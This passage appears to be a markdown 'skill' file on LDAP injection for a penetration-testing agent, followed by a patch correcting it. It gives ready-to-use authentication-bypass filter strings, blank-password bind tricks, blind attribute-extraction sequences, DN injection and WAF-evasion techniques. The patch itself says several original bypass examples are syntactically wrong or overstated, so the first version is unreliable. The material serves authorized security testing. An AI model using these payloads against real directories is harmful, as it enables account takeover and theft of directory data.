`DirectorySearcher`/`DirectoryEntry`, Node `ldapjs` +- SSO/auth middleware: PAM LDAP modules, Apache `mod_authnz_ldap`, Spring Security LDAP, Keycloak/Okta LDAP federation +- Directory-backed features: employee/user search, group membership checks, address-book lookups, password-reset identity verification + +**Input Locations** +- Login username/password fields bound directly into a search-then-bind flow +- Search/filter parameters (`cn=`, `mail=`, `sAMAccountName=`) exposed via "find user" or "find group" APIs +- Attributes echoed into modify/add operations (`ldapmodify`-equivalent calls) — second-order sink +- Base DN or OU selectors driven by user-controlled tenant/org identifiers + +## High-Value Targets + +- Login forms performing search-then-bind (`(&(uid=INPUT)(objectClass=user))` then bind as the found DN) +- "Forgot password" / account-recovery flows that resolve identity via LDAP search +- User/group directory search and autocomplete endpoints +- SSO bridges and reverse proxies mapping HTTP auth to LDAP bind (Apache/Nginx LDAP modules) +- Self-service profile update or group-join features that write attributes back to the directory (second-order injection) +- Multi-tenant apps where a user-supplied org/tenant ID is concatenated into the base DN + +## Detection Channels + +### Error-Based + +- Malformed filter syntax (unbalanced parens, stray `*`, invalid attribute names) often surfaces raw LDAP error text: `LDAPException`, `javax.naming.NameNotFoundException`, `Invalid DN syntax`, `Bad search filter` +- Distinguish directory implementation from error phrasing (AD vs OpenLDAP error codes differ, e.g. AD `data 52e`/`data 525` in bind failures) + +### Boolean-Based Blind + +- Compare application behavior (login success/failure, result count, "user found" vs "not found") between a filter forced true and one forced false +- No native `SLEEP()` equivalent in the LDAP protocol itself — blind extraction relies purely on response-shape differentials, not timing + +### Result-Count / Content Differential + +- Wildcard-widened filters return more entries than intended; count or listing differences confirm filter manipulation reached the query + +### Out-of-Band + +- Limited natively, but chained impact is possible: if extracted DNs or attributes are later used in SSRF-prone operations (e.g., `memberUrl` dynamic groups referencing external URLs in some directory extensions), pivot through that secondary channel + +## Core Payloads + +### Authentication Bypass (Search-Then-Bind) + +Target pattern: `(&(uid=INPUT)(userPassword=INPUT2))` or a two-step search-then-bind where only `uid` is attacker-controlled. + +``` +uid: *)(uid=*))(|(uid=* +``` +Resulting filter: `(&(uid=*)(uid=*))(|(uid=*)(userPassword=x))` — the trailing `(|(uid=*` clause is unbalanced by design so the parser accepts the first matching branch, returning the first directory entry (often the first admin/service account) as the bind target. + +``` +uid: admin)(&)) +``` +Neutralizes the second AND-clause: `(&(uid=admin)(&))(userPassword=...)` — some parsers short-circuit on the empty `(&)` and treat the identity as matched without password comparison. + +``` +uid: *)(|(objectClass=* +``` +Wildcard-widens to match any object in scope — useful when the app performs `search()` then blindly binds as whatever DN comes back first. + +### Attribute/Wildcard Enumeration + +``` +cn=admin* → matches any cn starting with "admin" +mail=*@corp.com → enumerates every account in the corp.com mail domain +sAMAccountName=* → returns first entry in scope (AD) +``` + +### Blind Boolean Extraction + +Extract an unknown attribute value (e.g., a service-account password stored in a custom attribute, or a hidden `description` field) character by character: + +``` +(&(uid=admin)(description=a*)) → true/false via app behavior +(&(uid=admin)(description=b*)) +... +(&(uid=admin)(description=ad*)) +``` +Binary-search the character space per position to minimize requests, exactly as in blind SQLi. + +### DN Injection + +When user input flows into the base DN or RDN rather than a filter value: + +``` +ou=Users,dc=corp,dc=com)(|(objectClass=* +``` +Escapes the intended subtree scope, expanding the search base to the entire directory or a sibling OU the app never intended to expose. + +## Key Vulnerabilities + +### Search Filter Injection (Classic) + +- Root cause: `"(&(uid=" + input + ")(objectClass=user))"` string concatenation +- Unbalanced parentheses in `input` change filter grouping; LDAP filter parsers are permissive about trailing content in many client libraries, so a syntactically "complete" leading clause is evaluated even with garbage appended +- Confirm by sending a value with an unescaped `)` and observing either an error or a behavior change vs. a value with the same `)` percent-encoded + +### Authentication Bypass via Search-Then-Bind + +- Most vulnerable pattern: app searches for a user by attacker-controlled identifier, then binds using the *returned DN* with the supplied password — if the search filter can be manipulated to always return the first entry in the directory (frequently a privileged service account near the top of the tree), and the app does not verify the returned `uid` matches the requested one, auth bypass follows +- Distinct from credential brute-force: this manipulates *which entry* is matched, not the password check itself + +### Blind Data Extraction + +- Any endpoint exposing a true/false or count signal (search UI, autocomplete, "email already registered" checks) can be walked attribute-by-attribute to exfiltrate directory contents an unauthenticated or low-privilege user should never see: internal usernames, email addresses, phone numbers, custom HR/organizational attributes, or group membership + +### Second-Order LDAP Injection + +- User-controlled data stored elsewhere (a profile field, an imported CSV, a webhook payload) is later read back and concatenated into an LDAP filter or DN during a *different* operation (e.g., a nightly sync job, a "find related users" feature) — payload must survive storage and reappear unescaped downstream + +### Blind Injection via Group/ACL Checks + +- Applications that gate access with `(&(uid=USER)(memberOf=cn=admins,ou=groups,dc=corp,dc=com))` are vulnerable if `USER` is attacker-controlled and unescaped — inject to short-circuit the `memberOf` clause entirely: `admin)(|(objectClass=*` + +### DN/RDN Injection in Write Operations + +- Where user input builds a target DN for add/modify/delete operations (self-service directory tools, provisioning APIs), injecting `,` or additional RDN components can redirect the operation to an unintended entry or OU + +## Bypass Techniques + +**Escaping Gaps** +- Applications frequently escape only `(` `)` `*` `\` per RFC 4515 §3 but miss NUL (`\00`), which historically truncated filter parsing in some implementations +- Inconsistent escaping between the *filter* context and the *DN* context — a value sanitized for one is often unescaped when reused in the other + +**Encoding Variants** +- URL-encode injected parentheses/asterisks to slip past naive WAF rules expecting literal `()` +- Double-encoding where the app decodes once before its own escaping routine runs + +**Whitespace and Case** +- LDAP attribute names are case-insensitive; mixed-case attribute names (`ObjectClass` vs `objectclass`) can evade filter-name allowlists implemented as case-sensitive string matches + +**Alternate Attribute Names (AD)** +- If `sAMAccountName` is filtered/validated, pivot to `userPrincipalName`, `cn`, or `mail` — many AD-backed apps validate only one attribute path while accepting several as equivalent identifiers + +## Testing Methodology + +1. **Inventory LDAP-backed features** — login, password reset, user/group search, autocomplete, SSO bridge, self-service profile/group tools +2. **Identify search-then-bind patterns** — distinguish "filter builds the bind DN" flows (highest impact) from "filter only returns display data" flows +3. **Probe escaping** — submit `)`, `(`, `*`, `\`, NUL in isolation; compare error text/behavior against a benign baseline +4. **Establish an oracle** — result count, "found"/"not found" messaging, HTTP status, redirect target, or timing-adjacent side effects +5. **Attempt filter-widening bypass** — wildcard and unbalanced-paren payloads against auth and search endpoints +6. **Attempt blind extraction** — if an oracle exists, walk a sensitive attribute character-by-character +7. **Check second-order sinks** — trace stored user input into background sync jobs, admin directory-search tools, or reporting features +8. **Confirm DN-context injection separately from filter-context injection** — the same payload class behaves differently depending on which syntax it lands in + +## Validation + +1. Demonstrate a filter-shape change: identical request differing only in the injected metacharacter produces a different result set or bind outcome +2. For auth bypass, show successful authentication as an account the tester does not control the credentials for +3. For blind extraction, retrieve a value not otherwise visible and independently confirm it (e.g., via an admin-visible directory browser) to rule out coincidence +4. Provide the exact filter string reconstructed from the vulnerable concatenation logic (from source, if white-box) alongside the request/response pair +5. Rule out that the differential is caused by input-length limits, unrelated validation errors, or rate limiting rather than filter semantics + +## False Positives + +- Input passed through a parameterized/escaping LDAP API (e.g., `ldap3`'s `escape_filter_chars`, JNDI's `DirContext` with proper `Rdn.escapeValue`) before concatenation +- Generic "invalid characters" validation errors that reject the payload before it reaches the directory call at all +- Directory servers configured with strict schema validation that reject malformed filters outright with no behavioral difference exploitable +- Search results that differ only due to normal pagination/sorting, not filter-scope change + +## Impact + +- Authentication bypass into arbitrary or privileged directory-backed accounts +- Enumeration and exfiltration of internal directory data: usernames, emails, phone numbers, org structure, group membership +- Authorization bypass where access control is enforced via `memberOf`/group-filter checks +- Lateral movement inside the target's identity infrastructure (Active Directory findings often chain into broader AD attack paths beyond the web app's scope) +- Unauthorized directory writes (attribute tampering, group membership changes) where write operations are reachable + +## Pro Tips + +1. Prioritize search-then-bind login flows — they carry the highest impact (full auth bypass) and are the most common vulnerable pattern +2. Test the same input in both filter context and DN context separately; escaping is frequently inconsistent between the two +3. Active Directory tolerates more filter malformation than OpenLDAP in some client libraries — fingerprint the backend early via error phrasing to calibrate payloads +4. When `$ne`-style widening payloads fail, fall back to attribute-name aliasing (`sAMAccountName` vs `userPrincipalName` vs `mail`) before concluding the sink is unreachable +5. Autocomplete and "check availability" endpoints are underexplored oracles for blind extraction — they leak boolean signal without looking like a security-relevant feature +6. Always check whether extracted DNs or attributes get reused in a second directory operation — second-order injection is common in provisioning/sync tooling +7. Document the exact vulnerable concatenation (from source when available); defenses must escape correctly per RFC 4515, not merely blocklist a handful of characters + +## Summary + +LDAP injection is eliminated the same way SQL injection is: never build filters or DNs via string concatenation. Use library-provided escaping (`escape_filter_chars`/`Rdn.escapeValue`) or parameterized filter builders on every value entering a search filter, a DN component, or a modify operation, and verify the identity returned by a search actually matches the identity requested before binding as it. From 5d7a9fbcdbbe7b21ca59f4f086ec1e69f69cb40c Mon Sep 17 00:00:00 2001 From: MoDarK-MK Date: Sat, 12 Sep 2026 15:36:41 +0330 Subject: [PATCH 3/3] fix: correct LDAP filter/DN syntax and overstated bypass claims - Replace unbalanced-paren auth-bypass examples with verified techniques: unauthenticated blank-password bind (RFC 4513), wildcard against search-only auth anti-patterns, and operator truncation now labeled as parser-dependent rather than a guaranteed bypass - Fix DN injection example to use RDN comma-separator grammar (RFC 4514) instead of filter syntax; clarify impact is bounded by existing directory structure unless no fixed suffix is appended - Align Key Vulnerabilities section and Pro Tips with the corrected techniques --- .../skills/vulnerabilities/ldap_injection.md | 57 ++++++++++++------- 1 file changed, 36 insertions(+), 21 deletions(-) diff --git a/strix/skills/vulnerabilities/ldap_injection.md b/strix/skills/vulnerabilities/ldap_injection.md index c8644b1b..b37dac2a 100644 --- a/strix/skills/vulnerabilities/ldap_injection.md +++ b/strix/skills/vulnerabilities/ldap_injection.md @@ -58,22 +58,33 @@ LDAP injection exploits unsanitized user input concatenated into LDAP search fil ### Authentication Bypass (Search-Then-Bind) -Target pattern: `(&(uid=INPUT)(userPassword=INPUT2))` or a two-step search-then-bind where only `uid` is attacker-controlled. +Three distinct mechanisms apply here, each requiring a different precondition. Do not report any of them as a working bypass until the resulting bind actually succeeds without the target account's real credentials — a widened search or a parser error is not proof by itself. + +**Unauthenticated ("blank password") bind — try this first** + +Per RFC 4513 §5.1.2, a bind with a non-empty DN and a *zero-length* password is defined as an unauthenticated bind, which most directory servers accept and report as success without checking any password. If the app calls `bind(foundDN, suppliedPassword)` without rejecting an empty `suppliedPassword` up front, submitting an empty password authenticates as whatever DN the search step returned — no filter metacharacter needed, and it works even against a fixed, valid `uid`: + +``` +uid: admin +password: (empty string) +``` + +**Wildcard value against a search-only auth check** + +Some implementations never bind at all — they treat "search returned a result" as authenticated, e.g. `(&(uid=INPUT)(userPassword=INPUT2))` evaluated only via `search()`. Here a wildcard produces a fully valid, balanced filter with no broken syntax: + +``` +uid: admin +password: * +``` +`(&(uid=admin)(userPassword=*))` matches the admin entry as long as it has *any* `userPassword` value set — true almost universally. This defeats only the search-only anti-pattern; confirm which flow you're facing (search-only vs. actual bind) before reporting. + +**Operator truncation (parser-dependent — verify before relying on it)** ``` uid: *)(uid=*))(|(uid=* ``` -Resulting filter: `(&(uid=*)(uid=*))(|(uid=*)(userPassword=x))` — the trailing `(|(uid=*` clause is unbalanced by design so the parser accepts the first matching branch, returning the first directory entry (often the first admin/service account) as the bind target. - -``` -uid: admin)(&)) -``` -Neutralizes the second AND-clause: `(&(uid=admin)(&))(userPassword=...)` — some parsers short-circuit on the empty `(&)` and treat the identity as matched without password comparison. - -``` -uid: *)(|(objectClass=* -``` -Wildcard-widens to match any object in scope — useful when the app performs `search()` then blindly binds as whatever DN comes back first. +Against `(&(uid=INPUT)(userPassword=INPUT2))` this yields `(&(uid=*)(uid=*))(|(uid=*)(userPassword=x))` — two adjacent top-level filter expressions, not one grouped OR. Whether this changes anything depends entirely on the client library: RFC 4515-strict parsers reject filters with trailing content after a complete expression, while some tolerant implementations parse only the first complete expression and silently discard the rest. Use this as a parser-fingerprinting probe, not an assumed bypass. Even where it does widen the *search* result, the subsequent *bind* still requires that returned DN's real password unless paired with the blank-password technique above. ### Attribute/Wildcard Enumeration @@ -97,25 +108,28 @@ Binary-search the character space per position to minimize requests, exactly as ### DN Injection -When user input flows into the base DN or RDN rather than a filter value: +Base/target DNs use RDN grammar (RFC 4514: comma-separated `attr=value` components), not filter syntax — parentheses and `|` have no special meaning in a DN and just become part of a literal, likely non-matching attribute value. Probe with the DN's actual separator instead: ``` -ou=Users,dc=corp,dc=com)(|(objectClass=* +Sales,ou=Executives ``` -Escapes the intended subtree scope, expanding the search base to the entire directory or a sibling OU the app never intended to expose. +If the app builds a search base as `"ou=" + input + ",dc=corp,dc=com"`, an unescaped comma in `input` inserts an additional RDN component **ahead of** the fixed suffix — this example yields `ou=Sales,ou=Executives,dc=corp,dc=com`, valid only if that exact nested path exists in the directory. Because the fixed suffix is appended verbatim, comma injection alone cannot remove or replace it; it can only add components in front of it, so impact here is bounded by the existing directory structure. + +The high-impact variant needs no injection trick at all: a directory-browser or "search within OU" feature that passes a path parameter straight through as the base DN with **no fixed suffix**. There, any DN the caller supplies becomes the literal search base outright, exposing whatever subtree it points to regardless of intended scope. ## Key Vulnerabilities ### Search Filter Injection (Classic) - Root cause: `"(&(uid=" + input + ")(objectClass=user))"` string concatenation -- Unbalanced parentheses in `input` change filter grouping; LDAP filter parsers are permissive about trailing content in many client libraries, so a syntactically "complete" leading clause is evaluated even with garbage appended +- Unbalanced parentheses in `input` change filter grouping, but the effect is parser-dependent: RFC 4515-strict implementations reject a filter with trailing content after a complete expression, while some client libraries parse only the first complete expression and silently discard the rest — establish which behavior applies before treating this as a reliable bypass rather than a fingerprinting probe - Confirm by sending a value with an unescaped `)` and observing either an error or a behavior change vs. a value with the same `)` percent-encoded ### Authentication Bypass via Search-Then-Bind -- Most vulnerable pattern: app searches for a user by attacker-controlled identifier, then binds using the *returned DN* with the supplied password — if the search filter can be manipulated to always return the first entry in the directory (frequently a privileged service account near the top of the tree), and the app does not verify the returned `uid` matches the requested one, auth bypass follows -- Distinct from credential brute-force: this manipulates *which entry* is matched, not the password check itself +- Highest-confidence variant: the app calls `bind(foundDN, suppliedPassword)` without rejecting a zero-length `suppliedPassword` first — RFC 4513's unauthenticated-bind semantics make the bind succeed regardless of the real password (see Core Payloads above) +- Filter-manipulation variant: if the search filter can be widened to change *which entry* is returned, and the app never verifies the returned identity matches the one requested, the attacker still needs that entry's real password to complete the bind on its own — this is an identity-confusion/data-exposure primitive, not a full bypass, unless combined with the blank-password technique +- Distinct from credential brute-force: these manipulate *which entry* is matched or *whether a password is checked at all*, not the password value itself ### Blind Data Extraction @@ -127,11 +141,12 @@ Escapes the intended subtree scope, expanding the search base to the entire dire ### Blind Injection via Group/ACL Checks -- Applications that gate access with `(&(uid=USER)(memberOf=cn=admins,ou=groups,dc=corp,dc=com))` are vulnerable if `USER` is attacker-controlled and unescaped — inject to short-circuit the `memberOf` clause entirely: `admin)(|(objectClass=*` +- Applications that gate access with `(&(uid=USER)(memberOf=cn=admins,ou=groups,dc=corp,dc=com))` are worth probing if `USER` is attacker-controlled and unescaped — try the operator-truncation payload from Core Payloads (`admin)(|(objectClass=*`) to test whether the parser discards the trailing `memberOf` clause, but confirm the specific client library's tolerance for trailing content before treating this as a reliable bypass rather than a fingerprinting probe ### DN/RDN Injection in Write Operations -- Where user input builds a target DN for add/modify/delete operations (self-service directory tools, provisioning APIs), injecting `,` or additional RDN components can redirect the operation to an unintended entry or OU +- Where user input builds a target DN for add/modify/delete operations (self-service directory tools, provisioning APIs), an unescaped comma inserts an extra RDN component ahead of any fixed suffix, redirecting the operation to a different — but still nested and existing — entry or OU +- Where no fixed suffix is appended at all, the supplied value becomes the literal target DN outright, with no injection technique required ## Bypass Techniques @@ -188,7 +203,7 @@ Escapes the intended subtree scope, expanding the search base to the entire dire 1. Prioritize search-then-bind login flows — they carry the highest impact (full auth bypass) and are the most common vulnerable pattern 2. Test the same input in both filter context and DN context separately; escaping is frequently inconsistent between the two 3. Active Directory tolerates more filter malformation than OpenLDAP in some client libraries — fingerprint the backend early via error phrasing to calibrate payloads -4. When `$ne`-style widening payloads fail, fall back to attribute-name aliasing (`sAMAccountName` vs `userPrincipalName` vs `mail`) before concluding the sink is unreachable +4. When wildcard/operator-truncation payloads fail, fall back to attribute-name aliasing (`sAMAccountName` vs `userPrincipalName` vs `mail`) before concluding the sink is unreachable 5. Autocomplete and "check availability" endpoints are underexplored oracles for blind extraction — they leak boolean signal without looking like a security-relevant feature 6. Always check whether extracted DNs or attributes get reused in a second directory operation — second-order injection is common in provisioning/sync tooling 7. Document the exact vulnerable concatenation (from source when available); defenses must escape correctly per RFC 4515, not merely blocklist a handful of characters